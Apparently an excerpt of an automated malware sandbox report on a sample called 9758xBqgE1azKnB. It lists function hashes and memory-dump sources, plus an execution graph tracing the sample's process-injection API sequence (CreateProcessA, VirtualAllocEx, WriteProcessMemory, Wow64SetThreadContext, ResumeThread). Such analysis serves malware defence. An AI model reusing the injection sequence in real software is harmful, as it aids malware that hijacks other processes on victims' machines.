                                                                        • Opcode ID: 144eb170991216fd05388646b75143d55ae689daf041af9a58e8f80e3270f445
                                                                        • Instruction ID: c56b53ec541d25f7f9bba2399132e9a7a0ebd3cafc099a716435fd4646e68828
                                                                        • Opcode Fuzzy Hash: 144eb170991216fd05388646b75143d55ae689daf041af9a58e8f80e3270f445
                                                                        • Instruction Fuzzy Hash: 02E039B4429110CFEB20DF58C8859A8BB79FF46300F05A0E2D8095B516CB34B940CF65
                                                                        Function 07375FBD Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 881a2168092f8349b6138874e0a878021af84c9b6b73e9ea0f84701f239df9a3
                                                                        • Instruction ID: bcc01c2dce8d8b4e5ebf0ddeb2c0dfd798572bbdfafef037f7a01c0abe216e68
                                                                        • Opcode Fuzzy Hash: 881a2168092f8349b6138874e0a878021af84c9b6b73e9ea0f84701f239df9a3
                                                                        • Instruction Fuzzy Hash: DCD012B7C00025978B10AFF4EA091EFFE35AB05620B518512E516BB914D3744765DBD1
                                                                        Function 07374E90 Relevance: .0, Instructions: 20COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 46c5b6f1d263c795883ea0e935c45f55e75f6ae6df8d75d968a53aaea608e250
                                                                        • Instruction ID: 8ac37fbcdc833349141e76b7e96eaf60172fbe49dc22a3a1998a65f1fd0295db
                                                                        • Opcode Fuzzy Hash: 46c5b6f1d263c795883ea0e935c45f55e75f6ae6df8d75d968a53aaea608e250
                                                                        • Instruction Fuzzy Hash: 04E0C2B094224CEBEB20EFB4C445AAD7BF8AB01214F504598D40953740DB382E44DB82
                                                                        Function 0737BE78 Relevance: .0, Instructions: 19COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c9dc450379d54ce0e16cbeae87ce29375d1bdd499dd0f460d2d76c47ff700ecd
                                                                        • Instruction ID: 8476ec502d3a1c5f30f22e1805d7328d0ab7096c1f52d3d46686fa2856875fd3
                                                                        • Opcode Fuzzy Hash: c9dc450379d54ce0e16cbeae87ce29375d1bdd499dd0f460d2d76c47ff700ecd
                                                                        • Instruction Fuzzy Hash: 32E08C71518218CFE7108BA4E8859A8B778FF8B242B0520E3E60A9B622CB319955DF75
                                                                        Function 0737CAF0 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3149e48c9a887236a32b5fd13607b47304a83ec1e92b2b4467e9221c3ef0239b
                                                                        • Instruction ID: 8c54a7eb8e6a61f3e4fc62f3b831c1c76dec8ec8c627eda0a4e777a68165304a
                                                                        • Opcode Fuzzy Hash: 3149e48c9a887236a32b5fd13607b47304a83ec1e92b2b4467e9221c3ef0239b
                                                                        • Instruction Fuzzy Hash: 6EE0B6B0D4020ADFD750EFB9C905A5EBBF8BF08210F1185A9D019E7211E7B49A04CF91
                                                                        Function 07375FC8 Relevance: .0, Instructions: 16COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction ID: 90ba51fb4f45e47d6db80118ba5a95a35d37cf6acb6887473580bbaeea7674b8
                                                                        • Opcode Fuzzy Hash: fcc788c89ca91730e34b729ea8219a5e8389f3dd18a4f57a8284d2c23dda9339
                                                                        • Instruction Fuzzy Hash: 49D09EB2D40139D78B10AFE9DC054DFFF79EF05650F418126E915A7100D3755A21DBD1
                                                                        Function 0737A2A0 Relevance: .0, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4373b9605b613c3ba7bb5f343342b9321ad4804ce217a2cabb31d379806ff162
                                                                        • Instruction ID: 2a80f728c77517a20487da9523291b3967cdf60a922f55019127cbdd4a372af9
                                                                        • Opcode Fuzzy Hash: 4373b9605b613c3ba7bb5f343342b9321ad4804ce217a2cabb31d379806ff162
                                                                        • Instruction Fuzzy Hash: 1FD0A7B3C982498AD7200A35EA4D2AC7F70DB55201F28051FE58CC0440E4218250C6D4
                                                                        Function 0737A6AB Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 456490032d8827b8b93e34f3e88e3bc7ce9edbb066bf8b09557b768d79ede539
                                                                        • Instruction ID: af895d7ee12050f465f7fa5bfc619f93fdaa182dc0d39af54a1c1fae97948467
                                                                        • Opcode Fuzzy Hash: 456490032d8827b8b93e34f3e88e3bc7ce9edbb066bf8b09557b768d79ede539
                                                                        • Instruction Fuzzy Hash: 43D092B0911229CFEB91EF28E885B9C7BB6FB05200F109695E0096B214DB701A80CF41
                                                                        Function 073755D0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 21405fc777d1da3f07ee82014df5bc45eb9933e446aec7728c2872f66af627e4
                                                                        • Instruction ID: 327ed2ec53314f0991a77d7a4cec3b99fdfb5387ac549c06bfe8c2b29c2ac2e0
                                                                        • Opcode Fuzzy Hash: 21405fc777d1da3f07ee82014df5bc45eb9933e446aec7728c2872f66af627e4
                                                                        • Instruction Fuzzy Hash: 12C08CEB51D0809EFB153F30C918E002E08EFB5204B0AC1928244C9071E447D0349382
                                                                        Function 0737A2B0 Relevance: .0, Instructions: 10COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e695378e1df2e21580f1dd2ebeada0eea2e5b781cbc51097216b5aa2cb10506d
                                                                        • Instruction ID: 238970b9f96e64593e4bb77e29affd4b40cb090e2931b3280e8d0e5edeac36df
                                                                        • Opcode Fuzzy Hash: e695378e1df2e21580f1dd2ebeada0eea2e5b781cbc51097216b5aa2cb10506d
                                                                        • Instruction Fuzzy Hash: D6C08C7109070C87E31027AAE40E37C3EE8A701302F489021F00D514218FA60450CBB9
                                                                        Function 073758E4 Relevance: .0, Instructions: 8COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000E.00000002.1853867639.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_14_2_7370000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fffadea3108fd2b9dd7dd3dd656611e4acd10d4b7ba9b94c08c7c93aad17a5e5
                                                                        • Instruction ID: 6068e3e0ab41065d60364096e6be60e53e27fe37eeb8235228baaca51fc783ce
                                                                        • Opcode Fuzzy Hash: fffadea3108fd2b9dd7dd3dd656611e4acd10d4b7ba9b94c08c7c93aad17a5e5
                                                                        • Instruction Fuzzy Hash: 57B012F9176100F2702467B48C80B3F5421FBFB710F408C05324C0640085654474D26F

                                                                        Executed Functions

                                                                        Function 02F217E8 Relevance: 4.2, Strings: 3, Instructions: 446COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq$$tq
                                                                        • API String ID: 0-2863945821
                                                                        • Opcode ID: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
                                                                        • Instruction ID: d2a79d50657d59513c246446a710c23556ae9fe6d07b2a47ed2f693b131da160
                                                                        • Opcode Fuzzy Hash: ea643fbc37c731280fc76a45b9ff61c24f89994d1cc058a9bda702dcb916541e
                                                                        • Instruction Fuzzy Hash: CEF1CF707002168FDB19AB7AD858B2E7BB3FB88300F108468E91A9F395DF759C45DB91
                                                                        Function 02F217D8 Relevance: 2.8, Strings: 2, Instructions: 334COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq
                                                                        • API String ID: 0-1837209516
                                                                        • Opcode ID: f8c1fee68a630dd67f84df28cbf81d15b3dc7dbb507c1a68e6a9c460c6654e2c
                                                                        • Instruction ID: 280fb5c0e63f3f46564461af2519bf8cf92fb48dddcde2c937ef6ed19a343769
                                                                        • Opcode Fuzzy Hash: f8c1fee68a630dd67f84df28cbf81d15b3dc7dbb507c1a68e6a9c460c6654e2c
                                                                        • Instruction Fuzzy Hash: D2C1DF707002168FDB19AB76D85872E7BB3FB88340F108468D91A9F399DF749C45DB91
                                                                        Function 02F218CA Relevance: 2.8, Strings: 2, Instructions: 284COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $tq$$tq
                                                                        • API String ID: 0-1837209516
                                                                        • Opcode ID: f2e49d583f703ed1d9dd5453bc79a6b383d81656027fcdcde058a5e61e3a2503
                                                                        • Instruction ID: d212fd8c0c8e585e65e80f12de64e31e890bd0e824c3b64baeabab44682ee22a
                                                                        • Opcode Fuzzy Hash: f2e49d583f703ed1d9dd5453bc79a6b383d81656027fcdcde058a5e61e3a2503
                                                                        • Instruction Fuzzy Hash: 19A1FD70B002158FDB29AB7AD86472E76B3FB88340F14806CD91A9F399DF749C46CB91
                                                                        Function 02F20E00 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: d8824cb655450350c8a6d07a57b8ab21ed26a7134d91349a3f9d07b916a00607
                                                                        • Instruction ID: e0637b193c90f831a0f42093342b734b98e29814a42677c8e0961c368a096e97
                                                                        • Opcode Fuzzy Hash: d8824cb655450350c8a6d07a57b8ab21ed26a7134d91349a3f9d07b916a00607
                                                                        • Instruction Fuzzy Hash: 7A212071B002168FCB49EB79896463E7BF6AFC9200F1484AEE109DB3A5DE30CC46C791
                                                                        Function 02F20DF0 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: LRtq
                                                                        • API String ID: 0-4092542751
                                                                        • Opcode ID: ecc7c0b09e8203577538f7579431ff3bf7bbfb8f99aa1a5663daa5e52095804f
                                                                        • Instruction ID: 5a92e9cd756d3334f77322d7d060db02c76e899257305916cdb64c7167830b92
                                                                        • Opcode Fuzzy Hash: ecc7c0b09e8203577538f7579431ff3bf7bbfb8f99aa1a5663daa5e52095804f
                                                                        • Instruction Fuzzy Hash: DA213271B1012A8FCB49EB79895477E7BE6EBC8200F14846DE409DB395DF30DD0A8791
                                                                        Function 02F20901 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Hxq
                                                                        • API String ID: 0-2956916855
                                                                        • Opcode ID: 35d2491d36b02532fb7e9e7a60a2374c6c9e7dca380429bbdf5125ff16a12576
                                                                        • Instruction ID: e8fe739d2f40d2517e49cc0686d88fb2f3601a253e0d28e34921e6aa8197fc4a
                                                                        • Opcode Fuzzy Hash: 35d2491d36b02532fb7e9e7a60a2374c6c9e7dca380429bbdf5125ff16a12576
                                                                        • Instruction Fuzzy Hash: F321AF70E042489FCB58DFB8D5543AD7BF2EF85300F5484AE8409AB295EB748E09CB91
                                                                        Function 02F21338 Relevance: .5, Instructions: 527COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0dea863d690a55bda5e69bafa5a45e3ea4ad32c0babf2401874d16da4745db87
                                                                        • Instruction ID: c0c3b5a07933fbfb4ef667a9086d1b7a50bc4c911b0e2df11cdd383cdc883079
                                                                        • Opcode Fuzzy Hash: 0dea863d690a55bda5e69bafa5a45e3ea4ad32c0babf2401874d16da4745db87
                                                                        • Instruction Fuzzy Hash: AA216FB090520A9FCB02EFB9E8545ADBFF1FF45204F00499AD459EB2A6EA341E44CB91
                                                                        Function 02F20CE0 Relevance: .1, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: cdb2e9fdbbdcfa2d5aa9add747370547d94119dd02df2ef18fb4f4c763e56181
                                                                        • Instruction ID: b65f2ba728e624d818ebfcf568106763d84d015dbc3766a007f334e154ad0839
                                                                        • Opcode Fuzzy Hash: cdb2e9fdbbdcfa2d5aa9add747370547d94119dd02df2ef18fb4f4c763e56181
                                                                        • Instruction Fuzzy Hash: 982105B2B002159FCB44EBBE981837FBAEAEFD9351B14442ED50AD7354DE748C0547A1
                                                                        Function 02F20BC9 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0683c2e7ef3ec7ab03b1c6fd3e92348c713e0b754ca06f98792bbad3f292740c
                                                                        • Instruction ID: 838418ebba87125ccb2aeefb7feaa8750ca20afb35a660888631c94ca6b39e11
                                                                        • Opcode Fuzzy Hash: 0683c2e7ef3ec7ab03b1c6fd3e92348c713e0b754ca06f98792bbad3f292740c
                                                                        • Instruction Fuzzy Hash: BC318FB090020ADFCB05EFB6D8446ADBBB2FF88300F108969D415AB350EB359E85CF51
                                                                        Function 02F20BD8 Relevance: .1, Instructions: 69COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2a20c5b83d63c60374a216a9f15719d0b2502fe633212fc23d8f963d9b7843b
                                                                        • Instruction ID: 8cd7dd813fd08a506cc8d7ead31833aaf3de5368e8cc63857bb1eecc0e6d0fc2
                                                                        • Opcode Fuzzy Hash: d2a20c5b83d63c60374a216a9f15719d0b2502fe633212fc23d8f963d9b7843b
                                                                        • Instruction Fuzzy Hash: A52183B0A0020ADFCB04EFB6D8446ADBBB6FF88300F108569D415AB310EB746E81CF51
                                                                        Function 02F21708 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 40d38cc3411a6fb7c0c490e623367f09cce5a9051b7fd489e76cdf6c15d28c10
                                                                        • Instruction ID: 24f19790da59e5d3395ec1643bc592bcf04a0239e06613adf3e8b56f443837ce
                                                                        • Opcode Fuzzy Hash: 40d38cc3411a6fb7c0c490e623367f09cce5a9051b7fd489e76cdf6c15d28c10
                                                                        • Instruction Fuzzy Hash: EA11FEB0D0110AEFCF41EFFAE8445ADBBF1FB44204B00899AD429AB259EB341E44DF81
                                                                        Function 02F20838 Relevance: .0, Instructions: 43COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 37d54d11b8984907fe3f6c8ce4d636c574971c09ac7f3f6b23528dfbed59385a
                                                                        • Instruction ID: 5546ba8583f558fed380d9e0b33d73d9b163eb0de1e1831a3137c09c5843cb76
                                                                        • Opcode Fuzzy Hash: 37d54d11b8984907fe3f6c8ce4d636c574971c09ac7f3f6b23528dfbed59385a
                                                                        • Instruction Fuzzy Hash: 8111CCB051020A9FCB01DF7BFA84A597BB5F749304B109A94E4198F216E6786EC7DF82
                                                                        Function 02F20848 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000011.00000002.1857841903.0000000002F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_17_2_2f20000_9758xBqgE1azKnB.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dcb853ba4727a5f6d51cf2bcc4532b92a301e251b6bf5ed2b1fb2ae88d167f48
                                                                        • Instruction ID: f470772ecbfeadb982c7420ac61d635fa61100e90832a2521ee224a6a6eca5f7
                                                                        • Opcode Fuzzy Hash: dcb853ba4727a5f6d51cf2bcc4532b92a301e251b6bf5ed2b1fb2ae88d167f48
                                                                        • Instruction Fuzzy Hash: 22017D7051120A9FCB01DF7BFA84A557BB5F74C304B105A94A4198F215E6786EC6DF82

                                                                        Execution Graph

                                                                        Execution Coverage:10.1%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:221
                                                                        Total number of Limit Nodes:7
                                                                        execution_graph 28113 6ca1649 28115 6ca158c 28113->28115 28114 6ca15c9 28115->28114 28119 6ca32ce 28115->28119 28136 6ca3270 28115->28136 28152 6ca3260 28115->28152 28120 6ca325c 28119->28120 28121 6ca32d1 28119->28121 28122 6ca32ae 28120->28122 28168 6ca3b00 28120->28168 28172 6ca3ac0 28120->28172 28177 6ca36e3 28120->28177 28182 6ca3cce 28120->28182 28187 6ca3c4b 28120->28187 28192 6ca3f8a 28120->28192 28196 6ca37d1 28120->28196 28201 6ca38b1 28120->28201 28205 6ca4111 28120->28205 28209 6ca3952 28120->28209 28213 6ca3a1d 28120->28213 28217 6ca3ddf 28120->28217 28222 6ca37be 28120->28222 28121->28115 28122->28115 28137 6ca328a 28136->28137 28138 6ca3f8a 2 API calls 28137->28138 28139 6ca3c4b 2 API calls 28137->28139 28140 6ca3cce 2 API calls 28137->28140 28141 6ca32ae 28137->28141 28142 6ca36e3 2 API calls 28137->28142 28143 6ca3ac0 2 API calls 28137->28143 28144 6ca3b00 2 API calls 28137->28144 28145 6ca37be 2 API calls 28137->28145 28146 6ca3ddf 2 API calls 28137->28146 28147 6ca3a1d 2 API calls 28137->28147 28148 6ca3952 2 API calls 28137->28148 28149 6ca4111 2 API calls 28137->28149 28150 6ca38b1 2 API calls 28137->28150 28151 6ca37d1 2 API calls 28137->28151 28138->28141 28139->28141 28140->28141 28141->28115 28142->28141 28143->28141 28144->28141 28145->28141 28146->28141 28147->28141 28148->28141 28149->28141 28150->28141 28151->28141 28153 6ca3270 28152->28153 28154 6ca32ae 28153->28154 28155 6ca3f8a 2 API calls 28153->28155 28156 6ca3c4b 2 API calls 28153->28156 28157 6ca3cce 2 API calls 28153->28157 28158 6ca36e3 2 API calls 28153->28158 28159 6ca3ac0 2 API calls 28153->28159 28160 6ca3b00 2 API calls 28153->28160 28161 6ca37be 2 API calls 28153->28161 28162 6ca3ddf 2 API calls 28153->28162 28163 6ca3a1d 2 API calls 28153->28163 28164 6ca3952 2 API calls 28153->28164 28165 6ca4111 2 API calls 28153->28165 28166 6ca38b1 2 API calls 28153->28166 28167 6ca37d1 2 API calls 28153->28167 28154->28115 28155->28154 28156->28154 28157->28154 28158->28154 28159->28154 28160->28154 28161->28154 28162->28154 28163->28154 28164->28154 28165->28154 28166->28154 28167->28154 28169 6ca387d 28168->28169 28227 6ca0fd8 28168->28227 28231 6ca0fd0 28168->28231 28169->28122 28173 6ca3ac6 28172->28173 28175 6ca0fd8 ReadProcessMemory 28173->28175 28176 6ca0fd0 ReadProcessMemory 28173->28176 28174 6ca387d 28174->28122 28175->28174 28176->28174 28178 6ca370f 28177->28178 28235 6ca1170 28178->28235 28239 6ca1164 28178->28239 28183 6ca3c69 28182->28183 28243 6ca0c99 28183->28243 28247 6ca0ca0 28183->28247 28184 6ca3aae 28184->28122 28188 6ca3c51 28187->28188 28190 6ca0c99 ResumeThread 28188->28190 28191 6ca0ca0 ResumeThread 28188->28191 28189 6ca3aae 28189->28122 28190->28189 28191->28189 28251 6ca0e28 28192->28251 28255 6ca0e21 28192->28255 28193 6ca3fa8 28197 6ca37de 28196->28197 28199 6ca0fd8 ReadProcessMemory 28197->28199 28200 6ca0fd0 ReadProcessMemory 28197->28200 28198 6ca387d 28198->28122 28199->28198 28200->28198 28259 6ca0d49 28201->28259 28263 6ca0d50 28201->28263 28202 6ca38cb 28202->28122 28207 6ca0d49 Wow64SetThreadContext 28205->28207 28208 6ca0d50 Wow64SetThreadContext 28205->28208 28206 6ca412b 28207->28206 28208->28206 28267 6ca0ee8 28209->28267 28271 6ca0ee0 28209->28271 28210 6ca3979 28215 6ca0ee8 WriteProcessMemory 28213->28215 28216 6ca0ee0 WriteProcessMemory 28213->28216 28214 6ca3a4e 28215->28214 28216->28214 28219 6ca3c52 28217->28219 28218 6ca3aae 28218->28122 28219->28218 28220 6ca0c99 ResumeThread 28219->28220 28221 6ca0ca0 ResumeThread 28219->28221 28220->28218 28221->28218 28223 6ca37cb 28222->28223 28225 6ca0ee8 WriteProcessMemory 28223->28225 28226 6ca0ee0 WriteProcessMemory 28223->28226 28224 6ca37a6 28224->28122 28225->28224 28226->28224 28228 6ca1023 ReadProcessMemory 28227->28228 28230 6ca1067 28228->28230 28230->28169 28232 6ca0fd8 ReadProcessMemory 28231->28232 28234 6ca1067 28232->28234 28234->28169 28236 6ca11f9 28235->28236 28236->28236 28237 6ca135e CreateProcessA 28236->28237 28238 6ca13bb 28237->28238 28238->28238 28240 6ca1170 CreateProcessA 28239->28240 28242 6ca13bb 28240->28242 28242->28242 28244 6ca0ca0 ResumeThread 28243->28244 28246 6ca0d11 28244->28246 28246->28184 28248 6ca0ce0 ResumeThread 28247->28248 28250 6ca0d11 28248->28250 28250->28184 28252 6ca0e68 VirtualAllocEx 28251->28252 28254 6ca0ea5 28252->28254 28254->28193 28256 6ca0e28 VirtualAllocEx 28255->28256 28258 6ca0ea5 28256->28258 28258->28193 28260 6ca0d50 Wow64SetThreadContext 28259->28260 28262 6ca0ddd 28260->28262 28262->28202 28264 6ca0d95 Wow64SetThreadContext 28263->28264 28266 6ca0ddd 28264->28266 28266->28202 28268 6ca0f30 WriteProcessMemory 28267->28268 28270 6ca0f87 28268->28270 28270->28210 28272 6ca0ee8 WriteProcessMemory 28271->28272 28274 6ca0f87 28272->28274 28274->28210 28285 6ca15d9 28287 6ca158c 28285->28287 28286 6ca15c9 28287->28286 28288 6ca32ce 12 API calls 28287->28288 28289 6ca3260 12 API calls 28287->28289 28290 6ca3270 12 API calls 28287->28290 28288->28287 28289->28287 28290->28287 28291 94d000 28292 94d046 28291->28292 28296 94d5e8 28292->28296 28299 94d5d9 28292->28299 28293 94d133 28298 94d616 28296->28298 28302 94d23c 28296->28302 28298->28293 28300 94d23c DuplicateHandle 28299->28300 28301 94d616 28300->28301 28301->28293 28303 94d650 DuplicateHandle 28302->28303 28304 94d6e6 28303->28304 28304->28298 28275 6ca44c0 28276 6ca464b 28275->28276 28277 6ca44e6 28275->28277 28277->28276 28280 6ca4738 28277->28280 28283 6ca4740 PostMessageW 28277->28283 28281 6ca4740 PostMessageW 28280->28281 28282 6ca47ac 28281->28282 28282->28277 28284 6ca47ac 28283->28284 28284->28277 28305 944668 28306 94467a 28305->28306 28307 944686 28306->28307 28311 944779 28306->28311 28316 943e34 28307->28316 28309 9446a5 28312 94479d 28311->28312 28320 944888 